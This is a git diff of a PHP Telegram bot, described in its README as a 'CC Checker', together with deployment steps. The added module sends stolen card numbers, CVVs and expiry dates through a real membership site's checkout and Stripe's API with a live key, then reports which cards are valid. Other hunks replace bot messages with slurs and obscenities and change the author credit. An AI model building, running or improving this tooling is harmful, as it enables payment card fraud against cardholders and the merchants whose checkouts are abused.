+ curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+ curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+ curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
+ curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
+ curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+ curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+ curl_setopt($ch, CURLOPT_POSTFIELDS, 'action=checkout&txn=20q');
+ $curl3 = curl_exec($ch);
+
+ #------[CURL-4]------#
+
+ $ch = curl_init();
+ curl_setopt($ch, CURLOPT_URL, 'https://api.stripe.com/v1/payment_methods');
+ curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+ curl_setopt($ch, CURLOPT_POST, 1);
+ $headers = array();
+ $headers[] = 'authority: api.stripe.com';
+ $headers[] = 'method: POST';
+ $headers[] = 'path: /v1/payment_methods';
+ $headers[] = 'scheme: https';
+ $headers[] = 'accept: application/json';
+ $headers[] = 'accept-language: en-US,en;q=0.9';
+ $headers[] = 'content-type: application/x-www-form-urlencoded';
+ $headers[] = 'origin: https://js.stripe.com';
+ $headers[] = 'referer: https://js.stripe.com/';
+ $headers[] = 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"';
+ $headers[] = 'sec-ch-ua-mobile: ?0';
+ $headers[] = 'sec-ch-ua-platform: "Windows"';
+ $headers[] = 'sec-fetch-dest: empty';
+ $headers[] = 'sec-fetch-mode: cors';
+ $headers[] = 'sec-fetch-site: same-site';
+ $headers[] = 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36';
+ curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+ curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+ curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+ curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
+ curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
+ curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+ curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+ curl_setopt($ch, CURLOPT_POSTFIELDS, 'type=card&billing_details[address][postal_code]=10080&billing_details[name]=Madarchod+Randi&card[number]='.$cc.'&card[cvc]='.$cvv.'&card[exp_month]='.$mes.'&card[exp_year]='.$ano.'&guid=8bb1ed99-c599-402e-8062-662f2629c63279ace5&muid=aec96180-8cd4-4613-8e3a-49198d6d6e95f73a45&sid=7a39ec89-f779-457d-ab0c-c8f08add248cedb006&pasted_fields=number&payment_user_agent=stripe.js%2Fb003e5966%3B+stripe-js-v3%2Fb003e5966&time_on_page=22831&key=pk_live_51B8s7BBTWoZbCeAdpQBKwGDYAelb2OMqCwXCn6d8TF0Meo13RwBtRdZQbtynmThIRkiUtFh1sESQTLhB1JENjqIg00Y0mmjhRg');
+ $curl4 = curl_exec($ch);
+
+ // Stripe iD
+ $id = trim(strip_tags(getStr($curl4,'"id": "','"')));
+
+ #------[CURL-5]------#
+
+ $ch = curl_init();
+ curl_setopt($ch, CURLOPT_URL, 'https://theibsguide.com/wp-admin/admin-ajax.php');
+ curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+ curl_setopt($ch, CURLOPT_POST, 1);
+ $headers = array();
+ $headers[] = 'authority: theibsguide.com';
+ $headers[] = 'method: POST';
+ $headers[] = 'path: /wp-admin/admin-ajax.php';
+ $headers[] = 'scheme: https';
+ $headers[] = 'accept: application/json, text/javascript, */*; q=0.01';
+ $headers[] = 'accept-language: en-US,en;q=0.9';
+ $headers[] = 'cache-control: no-cache';
+ $headers[] = 'content-type: multipart/form-data; boundary=----WebKitFormBoundaryncQIn76PvC9A4Jxj';
+ #$headers[] = 'cookie: wordpress_sec_06d9b7b99047dbc33bf42c633a3d9d82=MCRAANDI%40gmail.com%7C1638625143%7CSN7km3nlNEQttgs7f0p091rnf26MmfVBNhYlIj4wrr8%7C974aa69902d7736a0b85a2738ca9d85f2b3849c2dd19772ed22cb8b6cb04ec97; _ga=GA1.2.410341711.1638452299; _gid=GA1.2.909717911.1638452299; wordpress_logged_in_06d9b7b99047dbc33bf42c633a3d9d82=MCRAANDI%40gmail.com%7C1638625143%7CSN7km3nlNEQttgs7f0p091rnf26MmfVBNhYlIj4wrr8%7C7742a403b31b557a838aa3b759886166dd9fdc9fff971131234685d843246075; PHPSESSID=697c22589a64bd2eb8f8ffa95ac57f47; ms-uid=697c22589a64bd2eb8f8ffa95ac57f47; __stripe_mid=747d3399-441e-4fff-a588-fb4315868166d8ca4b; __stripe_sid=6201d26e-7008-4189-b479-18c74a52d1dea755e9';
+ $headers[] = 'origin: https://theibsguide.com';
+ $headers[] = 'referer: https://theibsguide.com/register/happy-gut-guide?action=checkout&txn=20q';
+ $headers[] = 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"';
+ $headers[] = 'sec-ch-ua-mobile: ?0';
+ $headers[] = 'sec-ch-ua-platform: "Windows"';
+ $headers[] = 'sec-fetch-dest: empty';
+ $headers[] = 'sec-fetch-mode: cors';
+ $headers[] = 'sec-fetch-site: same-origin';
+ $headers[] = 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36';
+ $headers[] = 'x-requested-with: XMLHttpRequest';
+ curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+ curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+ curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+ curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
+ curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
+ curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+ curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+ curl_setopt($ch, CURLOPT_POSTFIELDS, '------WebKitFormBoundaryncQIn76PvC9A4Jxj
+ Content-Disposition: form-data; name="mepr_transaction_id"
+
+ 5612
+ ------WebKitFormBoundaryncQIn76PvC9A4Jxj
+ Content-Disposition: form-data; name="address_required"
+
+ 0
+ ------WebKitFormBoundaryncQIn76PvC9A4Jxj
+ Content-Disposition: form-data; name="card-name"
+
+ Madarchod Randi
+ ------WebKitFormBoundaryncQIn76PvC9A4Jxj
+ Content-Disposition: form-data; name="payment_method_id"
+
+ '.$id.'
+ ------WebKitFormBoundaryncQIn76PvC9A4Jxj
+ Content-Disposition: form-data; name="action"
+
+ mepr_stripe_confirm_payment
+ ------WebKitFormBoundaryncQIn76PvC9A4Jxj
+ Content-Disposition: form-data; name="mepr_current_url"
+
+ https://theibsguide.com/register/happy-gut-guide?action=checkout&txn=20q#mepr_jump
+ ------WebKitFormBoundaryncQIn76PvC9A4Jxj--');
+ $curl5 = curl_exec($ch);
+ $info = curl_getinfo($ch);
+ $time = $info['total_time'];
+ $time = substr_replace($time, '',4);
+ // Response
+ $respo = trim(strip_tags(getStr($curl5,'"error":"','"')));
+ echo "Response: $curl5$lista
+Status -» CVV Matched [AVS Failure] ✅
+Response -» Approved ( The zip code you supplied failed validation. ))){)
+Gateway -» Stripe Auth
+Time -» $times
+
+------- Bin Info -------
+Bank -» $bank
+Brand -» $schemename
+Type -» $typename
+Currency -» $currency
+Country -» $cname ($emoji - 💲$currency)
+Issuers Contact -» $phone
+----------------------------
+
+Checked By $firstname
+Bot By: Mabidax/a>",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);}
+
+ elseif(strpos($curl5, 'Your card has insufficient funds.')) {
+ addTotal();
+ addUserTotal($userId);
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ 'text'=>"Card: $lista
+ Status -» CVV Matched [Credit Floor] ✅
+ Response -» Approved (Insufficient Funds)
+ Gateway -» Stripe Auth
+ Time -» $times
+
+ ------- Bin Info -------
+ Bank -» $bank
+ Brand -» $schemename
+ Type -» $typename
+ Currency -» $currency
+ Country -» $cname ($emoji - 💲$currency)
+ Issuers Contact -» $phone
+ ----------------------------
+
+ Checked By $firstname
+ Bot By: Mabidax",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);}
+ elseif(strpos($curl5, "Your card's security code is incorrect.")) {
+ addTotal();
+ addUserTotal($userId);
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ 'text'=>"Card: $lista
+ Status -» CCN Matched [CVV2 Failure] ✅
+ Response -» Approved (Your card's security code is incorrect.)
+ Gateway -» Stripe Auth
+ Time -» $times
+
+ ------- Bin Info -------
+ Bank -» $bank
+ Brand -» $schemename
+ Type -» $typename
+ Currency -» $currency
+ Country -» $cname ($emoji - 💲$currency)
+ Issuers Contact -» $phone
+ ----------------------------
+
+ Checked By $firstname
+ Bot By: Mabidax",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);}
+
+ else{
+ addTotal();
+ addUserTotal($userId);
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ 'text'=>"Card: $lista
+ Status -» Dead ❌
+ Response -» Card was Declined
+ Gateway -» Stripe Auth 1
+ Time -» $times
+
+ ------- Bin Info -------
+ Bank -» $bank
+ Brand -» $schemename
+ Type -» $typename
+ Currency -» $currency
+ Country -» $cname ($emoji - 💲$currency)
+ Issuers Contact -» $phone
+ ----------------------------
+
+ Checked By $firstname
+ Bot By: Mabidax",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);}
+
+ }else{
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ 'text'=>"Cool! Fucking provide a CC to Check!!",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);
+ }
+ }
+}
+
+
+?>
\ No newline at end of file
diff --git a/modules/iban.php b/modules/iban.php
index 9348670..76b5c59 100644
--- a/modules/iban.php
+++ b/modules/iban.php
@@ -24,7 +24,7 @@
if($antispam != False){
bot('sendmessage',[
'chat_id'=>$chat_id,
- 'text'=>"[ANTI SPAM] Try again after $antispams.",
+ 'text'=>"[ Surprise MotherFucker! ANTI SPAM] Try again after $antispams.",
'parse_mode'=>'html',
'reply_to_message_id'=> $message_id,
]);
@@ -33,7 +33,7 @@
}else{
$messageidtoedit1 = bot('sendmessage',[
'chat_id'=>$chat_id,
- 'text'=>"Wait for Result...",
+ 'text'=>"U Can Jerk Off While I Provide The Result...",
'parse_mode'=>'html',
'reply_to_message_id'=> $message_id,
@@ -74,7 +74,7 @@
Time: $timetakens
━━━━━━━━━━━━━
Checked By $firstname
-Bot By: ɴɪɴᴊᴀ ɴᴀᴠᴇᴇɴ",
+Bot By: Mabidax",
'parse_mode'=>'html',
'disable_web_page_preview'=>'true'
@@ -88,7 +88,7 @@
━━━━━━━━━━
Checked By $firstname
-Bot By: ɴɪɴᴊᴀ ɴᴀᴠᴇᴇɴ",
+Bot By: Mabidax",
'parse_mode'=>'html',
'disable_web_page_preview'=>'true'
@@ -98,9 +98,9 @@
bot('editMessageText',[
'chat_id'=>$chat_id,
'message_id'=>$messageidtoedit,
- 'text'=>"Never Gonna Give you Up!
+ 'text'=>"Madar Chod
-Provide a Valid SK KEYYYY!",
+Valid IBAN DE!",
'parse_mode'=>'html',
'disable_web_page_preview'=>'true'
diff --git a/modules/me.php b/modules/me.php
index 77a028a..167f2ee 100644
--- a/modules/me.php
+++ b/modules/me.php
@@ -26,7 +26,7 @@
if($antispam != False){
bot('sendmessage',[
'chat_id'=>$chat_id,
- 'text'=>"[ANTI SPAM] Try again after $antispams.",
+ 'text'=>"[Ruk Madarjaat. ANTI SPAM] Try again after $antispams.",
'parse_mode'=>'html',
'reply_to_message_id'=> $message_id
]);
diff --git a/modules/skcheck.php b/modules/skcheck.php
index 111481b..fb229e5 100644
--- a/modules/skcheck.php
+++ b/modules/skcheck.php
@@ -74,7 +74,7 @@
Time -» $times
Checked By $firstname
-Bot By: ɴɪɴᴊᴀ ɴᴀᴠᴇᴇɴ",
+Bot By: Mabidax",
'parse_mode'=>'html',
'disable_web_page_preview'=>'true'
@@ -85,11 +85,11 @@
'message_id'=>$messageidtoedit,
'text'=>"SK Key: $skhidden
Status -» Auth Fail ❌
-Response -» Provided Secret Key is Dead
+Response -» Apne Jo SK daali h uski Maa chud gayi H
Time -» $times
Checked By $firstname
-Bot By: ɴɪɴᴊᴀ ɴᴀᴠᴇᴇɴ",
+Bot By: [ ARC Σ US ]",
'parse_mode'=>'html',
'disable_web_page_preview'=>'true'
@@ -99,7 +99,7 @@
bot('editMessageText',[
'chat_id'=>$chat_id,
'message_id'=>$messageidtoedit,
- 'text'=>"Never Gonna Give you Up!
+ 'text'=>"Bsdk!
Provide a Valid SK KEYYYY!",
'parse_mode'=>'html',
diff --git a/readme.MD b/readme.MD
index f7f4ad2..f478141 100644
--- a/readme.MD
+++ b/readme.MD
@@ -62,7 +62,7 @@ A Telegram CC Checker Bot with hella lotta features.
### Hosting on Heroku
- [](https://dashboard.heroku.com/new?template=https%3A%2F%2Fgithub.com%2Fiam-NVN%2FSDMN_CheckerBot%2Fblob%2Fheroku-version)
+ [](https://dashboard.heroku.com/new?template=https://github.com/Mabidax/SDMN_CheckerBot)
- Star and Fork this Repo
- Click on the Above Shown ```Deploy To Heroku``` Button
- Get Free Database from [Here](https://freesqldatabase.com)
@@ -70,11 +70,13 @@ A Telegram CC Checker Bot with hella lotta features.
- Import checkerbot.sql file into your Database through PHPmyAdmin
- Enter the Vars asked whilst Deploying the App
- Set Webhook to main.php in your Heroku app
- - https://api.telegram.org/bot[BOTTOKEN]/setWebhook?url=https://[HEROKUAPPNAME].herokuapp.com/main.php